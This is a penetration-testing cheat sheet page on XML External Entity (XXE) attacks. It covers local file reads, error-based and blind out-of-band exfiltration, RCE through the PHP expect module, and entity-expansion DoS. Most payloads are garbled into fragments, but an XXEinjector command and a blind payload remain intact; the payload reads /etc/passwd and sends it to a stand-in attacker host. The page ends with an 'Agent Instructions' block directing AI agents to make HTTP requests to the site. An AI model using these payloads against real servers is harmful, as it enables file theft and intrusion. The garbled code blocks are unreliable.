# XXE It occurs when XML data is taken from user-controlled input without properly sanitizing or securely parsing it, which could allow the user to use XML functionality to perform malicious actions. **Types**: In-Band and Blind. ## Tools

Tool	Details
XXEinjector	`ruby XXEinjector.rb --host=<TARGET> --httpport=<PORT> --path=<FILE_TO_READ> --file=<REQ_BURP> --oob=http --phpfilter` Take the BurpSuite REQ and enter `XXEINJECT` as the DTD. Display the outputs in `/Logs/<IP>/<PATH_FILE>`

## DTD (Document Type Definition) Defines a structure with which to validate the XML document. \ The DTD can be defined in the document itself (immediately after the first line) or in an external file, and then referenced within the XML document with the SYSTEM keyword. {% code overflow="wrap" %} ```xml SYSTEM "email.dtd"> ``` {% endcode %} {% code overflow="wrap" %} ```xml /"> ``` {% endcode %} ## Entities It is possible to define custom entities (XML variables) in XML DTDs. This can be done with the use of the `ENTITY` keyword, followed by the entity name and its value. To refer to an external defined entity use `&;`. {% code overflow="wrap" %} ``` [ "> /DTD"> ]> ``` {% endcode %} Use `&varA; &varB; &varC;` ## Parameter Entities XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD. {% code overflow="wrap" %} ``` %xxe; ]> ``` {% endcode %} Use `%xxe;` ## Attacks ### Read If outdated XML libraries are used and no filtering or cleaning is applied on our XML input, we may be able to read local files. #### Simple {% code overflow="wrap" %} ``` [ ]> ``` {% endcode %} Define `varX` then use it in the field that is displayed (`&varX;`) #### PHP wrapper Only with PHP web applications. If there are special XML characters in the file (such as `<` `>` `&` or binary) that would break the reference and not be used for the reference. {% code overflow="wrap" %} ``` [ ]> ``` {% endcode %} #### CDATA Other method to extract any type of data (including binary data) for any web application backend.\ Use the `CDATA` tag: `` \ The XML parser considers this part as raw data.

NOTE

{% code overflow="wrap" %} ```xml [ "> "> ]> ``` {% endcode %} **This will not work, since XML prevents merging internal and external entities.** To bypass use `XML Parameter` Entities, a special type of entity that begins with **`%`**.\ The special thing about `XML Parameter Entities` is that if we refer to them from an external source (ex., our server), then they would all be considered external and could be merged.

{% tabs %} {% tab title="1" %} {% code title="xxe.dtd" overflow="wrap" %} ``` "> "> ``` {% endcode %} {% code overflow="wrap" %} ```bash sudo python3 -m http.server 8000 ``` {% endcode %} {% code overflow="wrap" %} ``` [ :8000/xxe.dtd"> %xxe; %pwn; ]> ``` {% endcode %} Then use `&content;` {% endtab %} {% tab title="2" %}

echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
sudo python3 -m http.server 8000

{% code overflow="wrap" %} ``` [ "> :8000/xxe.dtd"> %xxe; ]> ``` {% endcode %} Then use `&joined` {% endtab %} {% endtabs %} #### Single item, NO DOCTYPE If you only control a single item of data that is placed into a server-side XML document and cannot define or modify a `DOCTYPE` element {% code overflow="wrap" %} ```xml ``` {% endcode %} #### Image SVG {% code overflow="wrap" %} ```xml ]> ``` {% endcode %} ### Error This method does not require a field to be displayed, but it does require the web application to display runtime errors (e.g., PHP errors), as it does not have adequate exception handling for XML input. In that case, it is possible to use this flaw to read the output of the XXE exploit. {% tabs %} {% tab title="1" %} {% code title="xxe.dtd" overflow="wrap" %} ``` "> %eval; %error; ``` {% endcode %} {% code overflow="wrap" %} ```bash sudo python3 -m http.server 8000 ``` {% endcode %} {% code overflow="wrap" %} ``` :8000/xxe.dtd"> %xxe; ]> ``` {% endcode %} {% endtab %} {% tab title="2" %} {% code title="xxe.dtd" overflow="wrap" %} ``` "> ``` {% endcode %} {% code overflow="wrap" %} ```bash sudo python3 -m http.server 8000 ``` {% endcode %} {% code overflow="wrap" %} ``` [ :8000/xxe.dtd"> %remote; %error; ]> ``` {% endcode %} {% endtab %} {% tab title="No Own External DTD" %} [Link](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-by-repurposing-a-local-dtd) Suppose there is a DTD file on the server filesystem at the location `/usr/local/app/schema.dtd`, and this DTD file defines an entity called `custom_entity`. {% code overflow="wrap" %} ``` "> %eval; %error; '> %local_dtd; ]> ``` {% endcode %} To find a DDT file just use the following payload and see if it returns an error.\ Systems typically always contain DTD files. Ex. linux GNOME desktop environment often have a DTD file at `/usr/share/yelp/dtd/docbookx.dtd` {% code overflow="wrap" %} ``` %local_dtd; ]> ``` {% endcode %} Since many common systems that include DTD files are open source, you can normally quickly obtain a copy of files through internet search and find an entity that you can redefine. {% endtab %} {% endtabs %} ### Blind Allows you to exfiltrate data without any output fields and without error printing.\ Try with `/etc/hostname` which has no newline characters. {% tabs %} {% tab title="1" %}

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

{% code overflow="wrap" %} ```bash sudo python3 -m http.server 8000 ``` {% endcode %} {% code overflow="wrap" %} ``` :8000/xxe.dtd"> %xxe; ]> ``` {% endcode %} {% endtab %} {% tab title="2" %} {% code title="xxe.dtd" overflow="wrap" %} ``` :8000/?content=%file;'>"> ``` {% endcode %} {% code overflow="wrap" %} ```bash sudo python3 -m http.server 8000 ``` {% endcode %} {% code overflow="wrap" %} ``` [ :8000/xxe.dtd"> %remote; %oob; ]> ``` {% endcode %} {% endtab %} {% endtabs %} ### RCE We can also execute remote code with XXE.\ Require the PHP **expect** module to be installed and enabled. \ Possible to execute commands and display the response in the displayed field or load a web shell on the server. (Beware of characters not allowed) {% code overflow="wrap" %} ```bash echo '' > shell.php sudo python3 -m http.server 80 ``` {% endcode %} {% code overflow="wrap" %} ``` [ /shell.php'"> ]> ``` {% endcode %} ### DoS Also possible to perform Denial of Server attacks. {% code overflow="wrap" %} ``` [ ]> ``` {% endcode %} This payload defines entity `a0` as DOS, refers to it several times with `a1`, then refers to `a1` with `a2`, and so on until the memory of the back-end server runs out due to self-reference cycles. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/web-attacks/xxe.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.